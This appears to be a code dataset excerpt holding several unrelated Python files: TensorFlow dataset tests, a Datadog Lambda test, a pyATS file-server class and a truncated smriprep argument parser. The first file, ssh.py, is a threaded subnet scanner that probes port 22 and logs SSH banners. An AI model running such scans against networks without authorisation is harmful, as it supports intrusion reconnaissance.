source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
ssh.py
|
import socket
import datetime
import sys
import ipaddress
import threading
import os
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
class ThreadManager(object):
i = 0
def __init__(self, ipList):
self.allIps = ipList
self.size = len(ipList)
def getNextIp(self):
if not (self.i >= self.size - 1):
ip = self.allIps[self.i]
self.i += 1
return ip
return 0
def getID(self):
return self.i + 1
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["threads", "Number of threads to run.", "50"], ["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
def print1(data):
if verbose:
print("\033[K" + data)
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
data = s.recv(4096)
s.close()
return ["True", data]
except socket.error:
s.close()
return "False"
except:
s.close()
return "FAIL"
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
if stop:
sys.exit()
isUp = checkServer(stringIP, port)
if isUp[0] != "FAIL":
if isUp[0] == "True":
openPorts = openPorts + 1
print1(GREEN + "[+] Port " + str(port) + " is open on '" + stringIP + "' - Connection response: " + str(isUp[1]) + END)
logLine = stringIP + " - " + str(isUp[1]) + "\n"
logLines.append(logLine)
elif not isUp[0] == "True":
print1(RED + "[-] Port " + str(port) + " is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
def core(moduleOptions):
print(
"\n" + GREEN + "SSH module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[2][2])
verbose = moduleOptions[3][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
allIPs = len(ipList)
if allIPs == 0:
raise Exception
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path.replace("modules", "")
if not os.path.exists(script_path + "logs"):
os.makedirs(script_path + "logs")
fileName = script_path + "logs/log-ssh-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
port = 22
openPorts = 0
threads = []
for i in range(threadCount):
i -= 1
t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
if done == threadCount and threadManager.getID() == allIPs:
break
statusWidget()
except KeyboardInterrupt:
stop = True
verbose = False
print("\n" + RED + "[I] Stopping..." + END)
stop = True
verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] SSH module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
|
test_lambda_wrapper_thread_safety.py
|
import time
# import unittest
import threading
from datadog import lambda_metric, datadog_lambda_wrapper
from datadog.threadstats.aws_lambda import _lambda_stats
TOTAL_NUMBER_OF_THREADS = 1000
class MemoryReporter(object):
""" A reporting class that reports to memory for testing. """
def __init__(self):
self.distributions = []
self.dist_flush_counter = 0
def flush_distributions(self, dists):
self.distributions += dists
self.dist_flush_counter = self.dist_flush_counter + 1
@datadog_lambda_wrapper
def wrapped_function(id):
lambda_metric("dist_" + str(id), 42)
# sleep makes the os continue another thread
time.sleep(0.001)
lambda_metric("common_dist", 42)
# Lambda wrapper - mute thread safety test, python 2.7 issues
# class TestWrapperThreadSafety(unittest.TestCase):
# def test_wrapper_thread_safety(self):
# _lambda_stats.reporter = MemoryReporter()
# for i in range(TOTAL_NUMBER_OF_THREADS):
# threading.Thread(target=wrapped_function, args=[i]).start()
# # Wait all threads to finish
# time.sleep(10)
# # Check that at least one flush happened
# self.assertGreater(_lambda_stats.reporter.dist_flush_counter, 0)
# dists = _lambda_stats.reporter.distributions
# self.assertEqual(len(dists), TOTAL_NUMBER_OF_THREADS + 1)
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
server.py
|
import importlib
import logging
import multiprocessing
import queue
import socket
import random
import netaddr
import psutil
from pyats import configuration as cfg
from pyats.datastructures import AttrDict
from pyats.utils.dicts import recursive_update
logger = logging.getLogger(__name__)
process = multiprocessing.get_context('fork')
FILETRANSFER_SUBNET_CFG = 'filetransfer.subnet'
TIMEOUT_DEFAULT = 10
ALPHA = 'abcdefghijklmnopqrstuvwxyz'
ALPHA = ALPHA + ALPHA.upper() + '0123456789'
class FileServer:
def __new__(cls, *args, **kwargs):
'''Retrieve specific protocol of FileServer
'''
factory_cls = cls
# Get class specific to protocol
if factory_cls is FileServer:
protocol = kwargs.get('protocol', '').lower()
if not protocol:
raise TypeError('No protocol specified')
try:
mod = 'genie.libs.filetransferutils.fileserver.protocols.%s' \
% protocol
protocol_mod = importlib.import_module(mod)
factory_cls = protocol_mod.FileServer
except (ImportError, AttributeError) as e:
raise TypeError('File server protocol %s not found!' %
str(protocol))
# Init new class
if factory_cls is not cls:
self = factory_cls.__new__(factory_cls, *args, **kwargs)
elif super().__new__ is object.__new__:
self = super().__new__(factory_cls)
self.__init__(*args, **kwargs)
else:
self = super().__new__(factory_cls, *args, **kwargs)
return self
def __init__(self, **kwargs):
self.server_info = {}
self.timeout = kwargs.pop('timeout', TIMEOUT_DEFAULT)
self.server_info.update(kwargs)
if 'subnet' not in self.server_info:
if 'address' in self.server_info:
# Can use the address as the subnet if given (with netmask /32)
self.server_info['subnet'] = self.server_info['address']
else:
# Otherwise try looking in the pyats configuration
self.server_info['subnet'] = cfg.get(FILETRANSFER_SUBNET_CFG)
# Ensure FileServer has a subnet
if not self.server_info.get('subnet'):
raise TypeError('FileServer missing subnet')
# Get specific ip from subnet
self.server_info['address'] = self._get_ip(self.server_info['subnet'])
# Extract name if provided
self.name = None
if 'name' in self.server_info:
self.name = self.server_info.pop('name')
# Extract testbed if provided
self.testbed = None
if 'testbed' in self.server_info:
self.testbed = self.server_info.pop('testbed')
# Extract synchro if provided to reduce number of file handles
self.synchro = None
if 'synchro' in self.server_info:
self.synchro = self.server_info.pop('synchro')
def __enter__(self):
# Start server, usually by spawning a process and get new info
info = self.start_server()
recursive_update(self.server_info, info)
# Verify server is successfully running using a client
try:
self.verify_server()
except Exception as e:
self.stop_server()
raise OSError('Failed to verify %s' % str(type(self))) from e
# Log address of server
address = self.server_info['address']
port = self.server_info.get('port')
if port:
address += ':%s' % port
logger.info('%s File Server started on %s' %
(self.protocol.upper(), address))
# Update testbed with new server info
if self.testbed is not None and self.name:
recursive_update(
self.testbed.servers.setdefault(self.name, AttrDict()),
self.server_info)
return self.server_info
def __exit__(self, type_=None, val=None, tb=None):
self.stop_server()
# Remove from testbed
if self.testbed and self.name:
self.testbed.servers.pop(self.name)
def __del__(self):
self.stop_server()
def _get_ip(self, subnet, netmask=None):
# convert subnet into an IPNetwork object
subnet = netaddr.IPNetwork(subnet)
if netmask:
subnet.netmask = netmask
valid_ips = []
# Check the IP addresses of all interfaces to find the ones that match
# the given subnet
interfaces = psutil.net_if_addrs()
for iname, iface in interfaces.items():
for snic in iface:
if snic.family == socket.AF_INET:
ip = netaddr.IPAddress(snic.address)
if ip in subnet:
valid_ips.append(snic.address)
# Must have exactly one match
if len(valid_ips) == 0:
raise TypeError('No valid IP for subnet %s' % (subnet))
elif len(valid_ips) > 1:
raise TypeError('More than one valid IP for subnet %s.\n%s\nTry a '
'more specific subnet.' %
(subnet, '\n'.join(valid_ips)))
return valid_ips[0]
def start_server(self):
# Start server
if self.synchro:
# start queue from given multiprocessing manager to reduce number of
# file handles
self.queue = self.synchro.Queue()
else:
# No multiprocessing manager, make a queue
self.queue = multiprocessing.Queue()
self.server_proc = process.Process(target=self.run_server)
self.server_proc.start()
# Wait for queue to ensure the server is running
try:
info = self.queue.get(True, self.timeout)
except queue.Empty:
self.stop_server()
raise Exception('%s server did not start after %s seconds' %
(self.protocol.upper(), self.timeout))
return info
def run_server(self):
# method to be run as a forked process
raise NotImplementedError
def verify_server(self):
raise NotImplementedError
def stop_server(self):
# Use getattr because not all protocols start a process
if getattr(self, 'server_proc', None):
self.server_proc.terminate()
self.server_proc.join()
self.server_proc = None
def _generate_credential(self):
# Generate a random string to use as credentials if none are given
return ''.join([random.choice(ALPHA) for x in range(10)])
|
run.py
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""sMRIPrep: Structural MRI PREProcessing workflow."""
def main():
"""Set an entrypoint."""
opts = get_parser().parse_args()
return build_opts(opts)
def check_deps(workflow):
"""Make sure all dependencies are installed."""
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd')
and which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object."""
from pathlib import Path
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from niworkflows.utils.spaces import Reference, SpatialReferences, OutputReferencesAction
from ..__about__ import __version__
parser = ArgumentParser(description='sMRIPrep: Structural MRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store', type=Path,
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store', type=Path,
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'sMRIPrep (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version='smriprep v{}'.format(__version__))
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--participant-label', '--participant_label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
g_bids.add_argument(
'--bids-filter-file', action='store', type=Path, metavar='PATH',
help='a JSON file describing custom BIDS input filters using pybids '
'{<suffix>:{<entity>:<filter>,...},...} '
'(https://github.com/bids-standard/pybids/blob/master/bids/layout/config/bids.json)')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nprocs', '--ncpus', '--nthreads', '--n_cpus', '-n-cpus',
action='store', type=int,
help='number of CPUs to be used.')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem-gb', '--mem_gb', action='store', default=0, type=float,
help='upper bound memory limit for sMRIPrep processes (in GB).')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--output-spaces', nargs='*', action=OutputReferencesAction, default=SpatialReferences(),
help='paths or keywords prescribing output spaces - '
'standard spaces will be extracted for spatial normalization.')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument(
'--skull-strip-template', default='OASIS30ANTs', type=Reference.from_string,
help='select a template for skull-stripping with antsBrainExtraction')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
g_ants.add_argument(
'--skull-strip-mode', action='store', choices=('auto', 'skip', 'force'),
default='auto', help='determiner for T1-weighted skull stripping (force ensures skull '
'stripping, skip ignores skull stripping, and auto automatically '
'ignores skull stripping if pre-stripped brains are detected).')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=Path,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
g_fs.add_argument(
'--fs-subjects-dir', metavar='PATH', type=Path,
help='Path to existing FreeSurfer subjects directory to reuse. '
'(default: OUTPUT_DIR/freesurfer)')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--fs-no-reconall',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store', type=Path, default=Path('work'),
help='path where intermediate results should be stored')
g_other.add_argument(
'--fast-track', action='store_true', default=False,
help='fast-track the workflow by searching for existing derivatives.')
g_other.add_argument(
